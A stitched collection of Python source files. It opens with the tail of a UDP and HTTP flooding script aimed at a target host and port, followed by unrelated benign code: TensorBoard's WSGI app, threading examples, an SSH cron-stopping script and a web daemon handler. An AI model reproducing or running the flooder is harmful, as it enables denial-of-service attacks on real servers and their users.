th = threading.Thread(target=http)
th.start()
except Exception as err:
print("Error:\n{err}")
break
else:
continue
def udp():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = random._urandom(1024)
while True:
try:
s.sendto(packet, (target, port))
print("[#] Attacking %s %s" %(target, port))
except:
print("[!] No Connection, server may be down")
break2
sys.exit(0)
def tcp():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = random._urandom(1024)
while True:
try:
s.sendto(packet, (target, port))
print("[#] Attacking %s %s" %(target, port))
except:
print("[!] No Connection, server may be down")
break
sys.exit(0)
def http():
fake_ip = "182.21.20.32" # Don't make you anonymous
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
s.close()
print("[#] Attacking %s %s" %(target, port))
except:
print("[!] No Connection, server may be down")
break
sys.exit(0)
if not target or not method or not port:
parser.print_help()
# sys.exit()
else:
main()
|
application.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
Provides TensorBoardWSGIApp for building a TensorBoard WSGI app.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import base64
import collections
import contextlib
import hashlib
import json
import os
import re
import shutil
import sqlite3
import tempfile
import textwrap
import threading
import time
import six
from six.moves.urllib import parse as urlparse # pylint: disable=wrong-import-order
from werkzeug import wrappers
from tensorboard import errors
from tensorboard.backend import empty_path_redirect
from tensorboard.backend import experiment_id
from tensorboard.backend import http_util
from tensorboard.backend import path_prefix
from tensorboard.backend.event_processing import db_import_multiplexer
from tensorboard.backend.event_processing import data_provider as event_data_provider # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_accumulator as event_accumulator # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_multiplexer as event_multiplexer # pylint: disable=line-too-long
from tensorboard.plugins import base_plugin
from tensorboard.plugins.audio import metadata as audio_metadata
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.histogram import metadata as histogram_metadata
from tensorboard.plugins.image import metadata as image_metadata
from tensorboard.plugins.pr_curve import metadata as pr_curve_metadata
from tensorboard.plugins.scalar import metadata as scalar_metadata
from tensorboard.util import tb_logging
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.TENSORS: 10,
}
# TODO(@wchargin): Once SQL mode is in play, replace this with an
# alternative that does not privilege first-party plugins.
DEFAULT_TENSOR_SIZE_GUIDANCE = {
scalar_metadata.PLUGIN_NAME: 1000,
image_metadata.PLUGIN_NAME: 10,
audio_metadata.PLUGIN_NAME: 10,
histogram_metadata.PLUGIN_NAME: 500,
pr_curve_metadata.PLUGIN_NAME: 100,
}
DATA_PREFIX = '/data'
PLUGIN_PREFIX = '/plugin'
PLUGINS_LISTING_ROUTE = '/plugins_listing'
PLUGIN_ENTRY_ROUTE = '/plugin_entry.html'
# Slashes in a plugin name could throw the router for a loop. An empty
# name would be confusing, too. To be safe, let's restrict the valid
# names as follows.
_VALID_PLUGIN_RE = re.compile(r'^[A-Za-z0-9_.-]+$')
logger = tb_logging.get_logger()
def tensor_size_guidance_from_flags(flags):
"""Apply user per-summary size guidance overrides."""
tensor_size_guidance = dict(DEFAULT_TENSOR_SIZE_GUIDANCE)
if not flags or not flags.samples_per_plugin:
return tensor_size_guidance
for token in flags.samples_per_plugin.split(','):
k, v = token.strip().split('=')
tensor_size_guidance[k] = int(v)
return tensor_size_guidance
def standard_tensorboard_wsgi(flags, plugin_loaders, assets_zip_provider):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugin_loaders: A list of TBLoader instances.
assets_zip_provider: See TBContext documentation for more information.
Returns:
The new TensorBoard WSGI application.
:type plugin_loaders: list[base_plugin.TBLoader]
:rtype: TensorBoardWSGI
"""
data_provider = None
multiplexer = None
reload_interval = flags.reload_interval
if flags.db_import:
# DB import mode.
db_uri = flags.db
# Create a temporary DB file if we weren't given one.
if not db_uri:
tmpdir = tempfile.mkdtemp(prefix='tbimport')
atexit.register(shutil.rmtree, tmpdir)
db_uri = 'sqlite:%s/tmp.sqlite' % tmpdir
db_connection_provider = create_sqlite_connection_provider(db_uri)
logger.info('Importing logdir into DB at %s', db_uri)
multiplexer = db_import_multiplexer.DbImportMultiplexer(
db_uri=db_uri,
db_connection_provider=db_connection_provider,
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads)
elif flags.db:
# DB read-only mode, never load event logs.
reload_interval = -1
db_connection_provider = create_sqlite_connection_provider(flags.db)
multiplexer = _DbModeMultiplexer(flags.db, db_connection_provider)
else:
# Regular logdir loading mode.
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
tensor_size_guidance=tensor_size_guidance_from_flags(flags),
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads,
event_file_active_filter=_get_event_file_active_filter(flags))
if flags.generic_data != 'false':
data_provider = event_data_provider.MultiplexerDataProvider(
multiplexer, flags.logdir or flags.logdir_spec
)
if reload_interval >= 0:
# We either reload the multiplexer once when TensorBoard starts up, or we
# continuously reload the multiplexer.
if flags.logdir:
path_to_run = {os.path.expanduser(flags.logdir): None}
else:
path_to_run = parse_event_files_spec(flags.logdir_spec)
start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval, flags.reload_task)
return TensorBoardWSGIApp(
flags, plugin_loaders, data_provider, assets_zip_provider, multiplexer)
def _handling_errors(wsgi_app):
def wrapper(*args):
(environ, start_response) = (args[-2], args[-1])
try:
return wsgi_app(*args)
except errors.PublicError as e:
request = wrappers.Request(environ)
error_app = http_util.Respond(
request, str(e), "text/plain", code=e.http_code
)
return error_app(environ, start_response)
# Let other exceptions be handled by the server, as an opaque
# internal server error.
return wrapper
def TensorBoardWSGIApp(
flags,
plugins,
data_provider=None,
assets_zip_provider=None,
deprecated_multiplexer=None):
"""Constructs a TensorBoard WSGI app from plugins and data providers.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugins: A list of plugins, which can be provided as TBPlugin subclasses
or TBLoader instances or subclasses.
assets_zip_provider: See TBContext documentation for more information.
data_provider: Instance of `tensorboard.data.provider.DataProvider`. May
be `None` if `flags.generic_data` is set to `"false"` in which case
`deprecated_multiplexer` must be passed instead.
deprecated_multiplexer: Optional `plugin_event_multiplexer.EventMultiplexer`
to use for any plugins not yet enabled for the DataProvider API.
Required if the data_provider argument is not passed.
Returns:
A WSGI application that implements the TensorBoard backend.
"""
db_uri = None
db_connection_provider = None
if isinstance(
deprecated_multiplexer,
(db_import_multiplexer.DbImportMultiplexer, _DbModeMultiplexer)):
db_uri = deprecated_multiplexer.db_uri
db_connection_provider = deprecated_multiplexer.db_connection_provider
plugin_name_to_instance = {}
context = base_plugin.TBContext(
data_provider=data_provider,
db_connection_provider=db_connection_provider,
db_uri=db_uri,
flags=flags,
logdir=flags.logdir,
multiplexer=deprecated_multiplexer,
assets_zip_provider=assets_zip_provider,
plugin_name_to_instance=plugin_name_to_instance,
window_title=flags.window_title)
tbplugins = []
for plugin_spec in plugins:
loader = make_plugin_loader(plugin_spec)
plugin = loader.load(context)
if plugin is None:
continue
tbplugins.append(plugin)
plugin_name_to_instance[plugin.plugin_name] = plugin
return TensorBoardWSGI(tbplugins, flags.path_prefix)
class TensorBoardWSGI(object):
"""The TensorBoard WSGI app that delegates to a set of TBPlugin."""
def __init__(self, plugins, path_prefix=''):
"""Constructs TensorBoardWSGI instance.
Args:
plugins: A list of base_plugin.TBPlugin subclass instances.
flags: An argparse.Namespace containing TensorBoard CLI flags.
Returns:
A WSGI application for the set of all TBPlugin instances.
Raises:
ValueError: If some plugin has no plugin_name
ValueError: If some plugin has an invalid plugin_name (plugin
names must only contain [A-Za-z0-9_.-])
ValueError: If two plugins have the same plugin_name
ValueError: If some plugin handles a route that does not start
with a slash
:type plugins: list[base_plugin.TBPlugin]
"""
self._plugins = plugins
self._path_prefix = path_prefix
if self._path_prefix.endswith('/'):
# Should have been fixed by `fix_flags`.
raise ValueError('Trailing slash in path prefix: %r' % self._path_prefix)
self.exact_routes = {
# TODO(@chihuahua): Delete this RPC once we have skylark rules that
# obviate the need for the frontend to determine which plugins are
# active.
DATA_PREFIX + PLUGINS_LISTING_ROUTE: self._serve_plugins_listing,
DATA_PREFIX + PLUGIN_ENTRY_ROUTE: self._serve_plugin_entry,
}
unordered_prefix_routes = {}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
plugin_names_encountered = set()
for plugin in self._plugins:
if plugin.plugin_name is None:
raise ValueError('Plugin %s has no plugin_name' % plugin)
if not _VALID_PLUGIN_RE.match(plugin.plugin_name):
raise ValueError('Plugin %s has invalid name %r' % (plugin,
plugin.plugin_name))
if plugin.plugin_name in plugin_names_encountered:
raise ValueError('Duplicate plugins for name %s' % plugin.plugin_name)
plugin_names_encountered.add(plugin.plugin_name)
try:
plugin_apps = plugin.get_plugin_apps()
except Exception as e: # pylint: disable=broad-except
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
raise
logger.warn('Plugin %s failed. Exception: %s',
plugin.plugin_name, str(e))
continue
for route, app in plugin_apps.items():
if not route.startswith('/'):
raise ValueError('Plugin named %r handles invalid route %r: '
'route does not start with a slash' %
(plugin.plugin_name, route))
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
path = route
else:
path = (
DATA_PREFIX + PLUGIN_PREFIX + '/' + plugin.plugin_name + route
)
if path.endswith('/*'):
# Note we remove the '*' but leave the slash in place.
path = path[:-1]
if '*' in path:
# note we re-add the removed * in the format string
raise ValueError('Plugin %r handles invalid route \'%s*\': Only '
'trailing wildcards are supported '
'(i.e., `/.../*`)' %
(plugin.plugin_name, path))
unordered_prefix_routes[path] = app
else:
if '*' in path:
raise ValueError('Plugin %r handles invalid route %r: Only '
'trailing wildcards are supported '
'(i.e., `/.../*`)' %
(plugin.plugin_name, path))
self.exact_routes[path] = app
# Wildcard routes will be checked in the given order, so we sort them
# longest to shortest so that a more specific route will take precedence
# over a more general one (e.g., a catchall route `/*` should come last).
self.prefix_routes = collections.OrderedDict(
sorted(
six.iteritems(unordered_prefix_routes),
key=lambda x: len(x[0]),
reverse=True))
self._app = self._create_wsgi_app()
def _create_wsgi_app(self):
"""Apply middleware to create the final WSGI app."""
app = self._route_request
app = empty_path_redirect.EmptyPathRedirectMiddleware(app)
app = experiment_id.ExperimentIdMiddleware(app)
app = path_prefix.PathPrefixMiddleware(app, self._path_prefix)
app = _handling_errors(app)
return app
@wrappers.Request.application
def _serve_plugin_entry(self, request):
"""Serves a HTML for iframed plugin entry point.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
name = request.args.get('name')
plugins = [
plugin for plugin in self._plugins if plugin.plugin_name == name]
if not plugins:
raise errors.NotFoundError(name)
if len(plugins) > 1:
# Technically is not possible as plugin names are unique and is checked
# by the check on __init__.
reason = (
'Plugin invariant error: multiple plugins with name '
'{name} found: {list}'
).format(name=name, list=plugins)
raise AssertionError(reason)
plugin = plugins[0]
module_path = plugin.frontend_metadata().es_module_path
if not module_path:
return http_util.Respond(
request, 'Plugin is not module loadable', 'text/plain', code=400)
# non-self origin is blocked by CSP but this is a good invariant checking.
if urlparse.urlparse(module_path).netloc:
raise ValueError('Expected es_module_path to be non-absolute path')
module_json = json.dumps('.' + module_path)
script_content = 'import({}).then((m) => void m.render());'.format(
module_json)
digest = hashlib.sha256(script_content.encode('utf-8')).digest()
script_sha = base64.b64encode(digest).decode('ascii')
html = textwrap.dedent("""
<!DOCTYPE html>
<head><base href="plugin/{name}/" /></head>
<body><script type="module">{script_content}</script></body>
""").format(name=name, script_content=script_content)
return http_util.Respond(
request,
html,
'text/html',
csp_scripts_sha256s=[script_sha],
)
@wrappers.Request.application
def _serve_plugins_listing(self, request):
"""Serves an object mapping plugin name to whether it is enabled.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
response = collections.OrderedDict()
for plugin in self._plugins:
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
# This plugin's existence is a backend implementation detail.
continue
start = time.time()
is_active = plugin.is_active()
elapsed = time.time() - start
logger.info(
'Plugin listing: is_active() for %s took %0.3f seconds',
plugin.plugin_name, elapsed)
plugin_metadata = plugin.frontend_metadata()
output_metadata = {
'disable_reload': plugin_metadata.disable_reload,
'enabled': is_active,
# loading_mechanism set below
'remove_dom': plugin_metadata.remove_dom,
# tab_name set below
}
if plugin_metadata.tab_name is not None:
output_metadata['tab_name'] = plugin_metadata.tab_name
else:
output_metadata['tab_name'] = plugin.plugin_name
es_module_handler = plugin_metadata.es_module_path
element_name = plugin_metadata.element_name
if element_name is not None and es_module_handler is not None:
logger.error(
'Plugin %r declared as both legacy and iframed; skipping',
plugin.plugin_name,
)
continue
elif element_name is not None and es_module_handler is None:
loading_mechanism = {
'type': 'CUSTOM_ELEMENT',
'element_name': element_name,
}
elif element_name is None and es_module_handler is not None:
loading_mechanism = {
'type': 'IFRAME',
'module_path': ''.join([
request.script_root, DATA_PREFIX, PLUGIN_PREFIX, '/',
plugin.plugin_name, es_module_handler,
]),
}
else:
# As a compatibility measure (for plugins that we don't
# control), we'll pull it from the frontend registry for now.
loading_mechanism = {
'type': 'NONE',
}
output_metadata['loading_mechanism'] = loading_mechanism
response[plugin.plugin_name] = output_metadata
return http_util.Respond(request, response, 'application/json')
def __call__(self, environ, start_response):
"""Central entry point for the TensorBoard application.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
return self._app(environ, start_response)
def _route_request(self, environ, start_response):
"""Delegate an incoming request to sub-applications.
This method supports strict string matching and wildcard routes of a
single path component, such as `/foo/*`. Other routing patterns,
like regular expressions, are not supported.
This is the main TensorBoard entry point before middleware is
applied. (See `_create_wsgi_app`.)
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
clean_path = _clean_path(parsed_url.path)
# pylint: disable=too-many-function-args
if clean_path in self.exact_routes:
return self.exact_routes[clean_path](environ, start_response)
else:
for path_prefix in self.prefix_routes:
if clean_path.startswith(path_prefix):
return self.prefix_routes[path_prefix](environ, start_response)
logger.warn('path %s not found, sending 404', clean_path)
return http_util.Respond(request, 'Not found', 'text/plain', code=404)(
environ, start_response)
# pylint: enable=too-many-function-args
def parse_event_files_spec(logdir_spec):
"""Parses `logdir_spec` into a map from paths to run group names.
The `--logdir_spec` flag format is a comma-separated list of path
specifications. A path spec looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a spec
with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir_spec is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
for specification in logdir_spec.split(','):
# Check if the spec contains group. A spec start with xyz:// is regarded as
# URI path spec instead of group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon. If the spec looks like
# [a-zA-z]:\foo then we assume its a Windows path and not a single letter
# group
if (uri_pattern.match(specification) is None and ':' in specification and
specification[0] != '/' and not os.path.splitdrive(specification)[0]):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(os.path.expanduser(path))
files[path] = run_name
return files
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval,
reload_task):
"""Starts automatically reloading the given multiplexer.
If `load_interval` is positive, the thread will reload the multiplexer
by calling `ReloadMultiplexer` every `load_interval` seconds, starting
immediately. Otherwise, reloads the multiplexer once and never again.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: An integer greater than or equal to 0. If positive, how many
seconds to wait after one load before starting the next load. Otherwise,
reloads the multiplexer once and never again (no continuous reloading).
reload_task: Indicates the type of background task to reload with.
Raises:
ValueError: If `load_interval` is negative.
"""
if load_interval < 0:
raise ValueError('load_interval is negative: %d' % load_interval)
def _reload():
while True:
start = time.time()
logger.info('TensorBoard reload process beginning')
for path, name in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logger.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logger.info('TensorBoard done reloading. Load took %0.3f secs', duration)
if load_interval == 0:
# Only load the multiplexer once. Do not continuously reload.
break
time.sleep(load_interval)
if reload_task == 'process':
logger.info('Launching reload in a child process')
import multiprocessing
process = multiprocessing.Process(target=_reload, name='Reloader')
# Best-effort cleanup; on exit, the main TB parent process will attempt to
# kill all its daemonic children.
process.daemon = True
process.start()
elif reload_task in ('thread', 'auto'):
logger.info('Launching reload in a daemon thread')
thread = threading.Thread(target=_reload, name='Reloader')
# Make this a daemon thread, which won't block TB from exiting.
thread.daemon = True
thread.start()
elif reload_task == 'blocking':
if load_interval != 0:
raise ValueError('blocking reload only allowed with load_interval=0')
_reload()
else:
raise ValueError('unrecognized reload_task: %s' % reload_task)
def create_sqlite_connection_provider(db_uri):
"""Returns function that returns SQLite Connection objects.
Args:
db_uri: A string URI expressing the DB file, e.g. "sqlite:~/tb.db".
Returns:
A function that returns a new PEP-249 DB Connection, which must be closed,
each time it is called.
Raises:
ValueError: If db_uri is not a valid sqlite file URI.
"""
uri = urlparse.urlparse(db_uri)
if uri.scheme != 'sqlite':
raise ValueError('Only sqlite DB URIs are supported: ' + db_uri)
if uri.netloc:
raise ValueError('Can not connect to SQLite over network: ' + db_uri)
if uri.path == ':memory:':
raise ValueError('Memory mode SQLite not supported: ' + db_uri)
path = os.path.expanduser(uri.path)
params = _get_connect_params(uri.query)
# TODO(@jart): Add thread-local pooling.
return lambda: sqlite3.connect(path, **params)
def _get_connect_params(query):
params = urlparse.parse_qs(query)
if any(len(v) > 2 for v in params.values()):
raise ValueError('DB URI params list has duplicate keys: ' + query)
return {k: json.loads(v[0]) for k, v in params.items()}
def _clean_path(path):
"""Removes a trailing slash from a non-root path.
Arguments:
path: The path of a request.
Returns:
The route to use to serve the request.
"""
if path != '/' and path.endswith('/'):
return path[:-1]
return path
def _get_event_file_active_filter(flags):
"""Returns a predicate for whether an event file load timestamp is active.
Returns:
A predicate function accepting a single UNIX timestamp float argument, or
None if multi-file loading is not enabled.
"""
if not flags.reload_multifile:
return None
inactive_secs = flags.reload_multifile_inactive_secs
if inactive_secs == 0:
return None
if inactive_secs < 0:
return lambda timestamp: True
return lambda timestamp: timestamp + inactive_secs >= time.time()
class _DbModeMultiplexer(event_multiplexer.EventMultiplexer):
"""Shim EventMultiplexer to use when in read-only DB mode.
In read-only DB mode, the EventMultiplexer is nonfunctional - there is no
logdir to reload, and the data is all exposed via SQL. This class represents
the do-nothing EventMultiplexer for that purpose, which serves only as a
conduit for DB-related parameters.
The load APIs raise exceptions if called, and the read APIs always
return empty results.
"""
def __init__(self, db_uri, db_connection_provider):
"""Constructor for `_DbModeMultiplexer`.
Args:
db_uri: A URI to the database file in use.
db_connection_provider: Provider function for creating a DB connection.
"""
logger.info('_DbModeMultiplexer initializing for %s', db_uri)
super(_DbModeMultiplexer, self).__init__()
self.db_uri = db_uri
self.db_connection_provider = db_connection_provider
logger.info('_DbModeMultiplexer done initializing')
def AddRun(self, path, name=None):
"""Unsupported."""
raise NotImplementedError()
def AddRunsFromDirectory(self, path, name=None):
"""Unsupported."""
raise NotImplementedError()
def Reload(self):
"""Unsupported."""
raise NotImplementedError()
def make_plugin_loader(plugin_spec):
"""Returns a plugin loader for the given plugin.
Args:
plugin_spec: A TBPlugin subclass, or a TBLoader instance or subclass.
Returns:
A TBLoader for the given plugin.
"""
if isinstance(plugin_spec, base_plugin.TBLoader):
return plugin_spec
if isinstance(plugin_spec, type):
if issubclass(plugin_spec, base_plugin.TBLoader):
return plugin_spec()
if issubclass(plugin_spec, base_plugin.TBPlugin):
return base_plugin.BasicLoader(plugin_spec)
raise TypeError("Not a TBLoader or TBPlugin subclass: %r" % (plugin_spec,))
|
example2.py
|
import threading
import random
import time
def update():
global counter
with count_lock:
current_counter = counter # reading in shared resource
time.sleep(random.randint(0, 1)) # simulating heavy calculations
counter = current_counter + 1
counter = 0
count_lock = threading.Lock()
threads = [threading.Thread(target=update) for i in range(20)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
print(f"Final counter: {counter}.")
print("Finished.")
|
monitor-cloud.py
|
from threading import Thread
import time
from django.core.management.base import BaseCommand
from clouds.models import Instance
class Command(BaseCommand):
help = 'monitor cloud resource periodly'
def handle(self, *args, **options):
while True:
for instance in Instance.objects.exclude(uuid=None):
Thread(target=instance.monitor).start()
time.sleep(0.1)
time.sleep(300)
|
stopcron.py
|
#!/usr/bin/python
import argparse
import getpass
import os
import sys
import paramiko
import socket
import Queue
import threading
import time
def sshStopCron(retry,hostname):
global user
global password
if retry == 0:
print "Stop Cron Failed in", hostname
q.task_done()
return
try:
s = paramiko.SSHClient()
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if os.path.isfile(password) == True:
s.connect(hostname, username=user, key_filename = password, timeout=60)
else:
s.connect(hostname, username=user, password = password, timeout=60)
transport = s.get_transport()
session = transport.open_session()
session.set_combine_stderr(True)
session.get_pty()
command = "sudo mv /etc/cron.d/ifagent InsightAgent-master/ifagent."+time.strftime("%Y%m%d%H%M%S")+"\n"
session.exec_command(command)
stdin = session.makefile('wb', -1)
stdout = session.makefile('rb', -1)
stdin.write(password+'\n')
stdin.flush()
session.recv_exit_status() #wait for exec_command to finish
s.close()
print "Stopped Cron in ", hostname
q.task_done()
return
except paramiko.SSHException, e:
print "Invalid Username/Password for %s:"%hostname , e
return sshStopCron(retry-1,hostname)
except paramiko.AuthenticationException:
print "Authentication failed for some reason in %s:"%hostname
return sshStopCron(retry-1,hostname)
except socket.error, e:
print "Socket connection failed in %s:"%hostname, e
return sshStopCron(retry-1,hostname)
def get_args():
parser = argparse.ArgumentParser(
description='Script retrieves arguments for stopping insightfinder agent.')
parser.add_argument(
'-n', '--USER_NAME_IN_HOST', type=str, help='User Name in Hosts', required=True)
parser.add_argument(
'-p', '--PASSWORD', type=str, help='Password for hosts', required=True)
args = parser.parse_args()
user = args.USER_NAME_IN_HOST
password = args.PASSWORD
return user, password
if __name__ == '__main__':
hostfile="hostlist.txt"
q = Queue.Queue()
user, password = get_args()
try:
with open(os.getcwd()+"/"+hostfile, 'rb') as f:
while True:
line = f.readline()
if line:
host=line.split("\n")[0]
q.put(host)
else:
break
while q.empty() != True:
host = q.get()
t = threading.Thread(target=sshStopCron, args=(3,host,))
t.daemon = True
t.start()
q.join()
except (KeyboardInterrupt, SystemExit):
print "Keyboard Interrupt!!"
sys.exit()
except IOError as e:
print "I/O error({0}): {1}: {2}".format(e.errno, e.strerror, e.filename)
sys.exit()
|
multiprocess.py
|
import torch.multiprocessing as mp
import keyboard
from PIL import Image
import torchvision
from base import *
from test import Time_counter
import _init_paths
from utils.demo_utils import OpenCVCapture, Open3d_visualizer
class Multiprocess(Base):
def __init__(self):
self.run_single_camera()
def set_up_model_pool(self):
self.model_pool = []
for i in range(self.model_number):
self.model_pool.append(Base())
def single_image_forward(self,image):
image_size = image.shape[:2][::-1]
image_org = Image.fromarray(image)
resized_image_size = (float(self.input_size)/max(image_size) * np.array(image_size) // 2 * 2).astype(np.int)[::-1]
padding = tuple((self.input_size-resized_image_size)[::-1]//2)
transform = torchvision.transforms.Compose([
torchvision.transforms.Resize(resized_image_size, interpolation=3),
torchvision.transforms.Pad(padding, fill=0, padding_mode='constant'),
])
image = torch.from_numpy(np.array(transform(image_org))).unsqueeze(0).cuda().contiguous().float()
outputs = self.net_forward(meta_data, cfg=self.demo_cfg)
return outputs
def image_put(self, q):
self.capture = OpenCVCapture()
time.sleep(3)
while True:
if q.qsize() > 2:
q.get()
q.put(self.capture.read())
def image_get(self, q, q_vis):
super(Multiprocess, self).__init__()
self._build_model_()
self.generator.eval()
for i in range(10):
self.single_image_forward(np.zeros((512,512,3)).astype(np.uint8))
while True:
try:
frame = q.get()
with torch.no_grad():
outputs = self.single_image_forward(frame)
q_vis.put((frame,outputs))
except Exception as error:
print(error)
self.endprocess()
def show_results(self, q):
'''
17.5 FPS of entire process on 1080
'''
self.visualizer = Open3d_visualizer()
self.counter = Time_counter(thresh=0.1)
time.sleep(4)
start_flag = 1
while True:
try:
if start_flag:
self.counter.start()
frame,outputs = q.get()
start_flag=0
break_flag = self.visualize(frame,outputs)
self.counter.count()
self.counter.fps()
if break_flag:
self.endprocess()
except Exception as error:
print(error)
#self.endprocess()
def visualize(self,frame,outputs):
verts = outputs['verts'][0].cpu().numpy()
verts = verts * 50 + np.array([0, 0, 100])
break_flag = self.visualizer.run(verts,frame)
return break_flag
def run_single_camera(self):
queue = mp.Queue(maxsize=3)
queue_vis = mp.Queue(maxsize=3)
self.processes = [mp.Process(target=self.image_put, args=(queue,)),
mp.Process(target=self.image_get, args=(queue,queue_vis,)),
mp.Process(target=self.show_results, args=(queue_vis,))]
[process.start() for process in self.processes]
[process.join() for process in self.processes]
def endprocess(self):
[process.terminate() for process in self.processes]
[process.join() for process in self.processes]
def main(vedio_path):
mulp = Multiprocess()
mulp.run_single_camera()
if __name__ == '__main__':
main()
|
daemon.py
|
#!/usr/bin/env python3
# -*- coding: iso-8859-1 -*-
############################################################################
# #
# Copyright (c) 2017 eBay Inc. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
############################################################################
from __future__ import print_function
from __future__ import division
from web import ThreadedHTTPServer, ThreadedUnixHTTPServer, BaseWebHandler
import sys
import argparse
import socket
import traceback
import signal
import os
import control
import configfile
import resource
import autoflush
import time
from stat import S_ISSOCK
from threading import Thread, Lock as TLock, Lock as JLock
from string import ascii_letters
import random
import atexit
from compat import unicode
from extras import json_encode, json_decode, DotDict
from dispatch import JobError
from status import statmsg_sink, children, print_status_stacks, status_stacks_export
DEBUG_WRITE_JSON = False
def gen_cookie(size=16):
return ''.join(random.choice(ascii_letters) for _ in range(size))
# This contains cookie: {lock, last_error, last_time} for all jobs, main jobs have cookie None.
job_tracking = {None: DotDict(lock=JLock(), last_error=None, last_time=0)}
# This needs .ctrl to work. It is set from main()
class XtdHandler(BaseWebHandler):
server_version = "scx/0.1"
DEBUG = not True
def log_message(self, format, *args):
return
def encode_body(self, body):
if isinstance(body, bytes):
return body
if isinstance(body, unicode):
return body.encode('utf-8')
return json_encode(body)
def handle_req(self, path, args):
if self.DEBUG: print("@daemon.py: Handle_req, path = \"%s\", args = %s" %( path, args ), file=sys.stderr)
try:
self._handle_req( path, args )
except Exception:
traceback.print_exc()
self.do_response(500, "text/plain", "ERROR")
def _handle_req(self, path, args):
if path[0] == 'status':
data = job_tracking.get(args.get('subjob_cookie') or None)
if not data:
self.do_response(500, 'text/plain', 'bad subjob_cookie!\n' )
return
timeout = min(float(args.get('timeout', 0)), 128)
status = DotDict(idle=data.lock.acquire(False))
deadline = time.time() + timeout
while not status.idle and time.time() < deadline:
time.sleep(0.1)
status.idle = data.lock.acquire(False)
if status.idle:
if data.last_error:
status.last_error = data.last_error
data.last_error = None
else:
status.last_time = data.last_time
data.lock.release()
elif path == ['status', 'full']:
status.status_stacks, status.current = status_stacks_export()
self.do_response(200, "text/json", status)
return
elif path==['list_workspaces']:
ws = {k: v.path for k, v in self.ctrl.list_workspaces().items()}
self.do_response(200, "text/json", ws)
elif path==['config']:
self.do_response(200, "text/json", self.ctrl.config)
elif path==['update_methods']:
self.do_response(200, "text/json", self.ctrl.update_methods())
elif path==['methods']:
""" return a json with everything the Method object knows about the methods """
self.do_response(200, "text/json", self.ctrl.get_methods())
elif path[0]=='method_info':
method = path[1]
self.do_response(200, "text/json", self.ctrl.method_info(method))
elif path[0]=='set_workspace':
_ws = path[1]
if _ws not in self.ctrl.list_workspaces():
self.do_response(500,'text/plain', 'Undefined workspace \"%s\"\n' % _ws)
else:
self.ctrl.set_workspace(_ws)
self.do_response(200,'text/plain', 'Workspace set to \"%s\"\n' % _ws)
elif path[0]=='workspace_info':
self.do_response(200, 'text/json', self.ctrl.get_workspace_details())
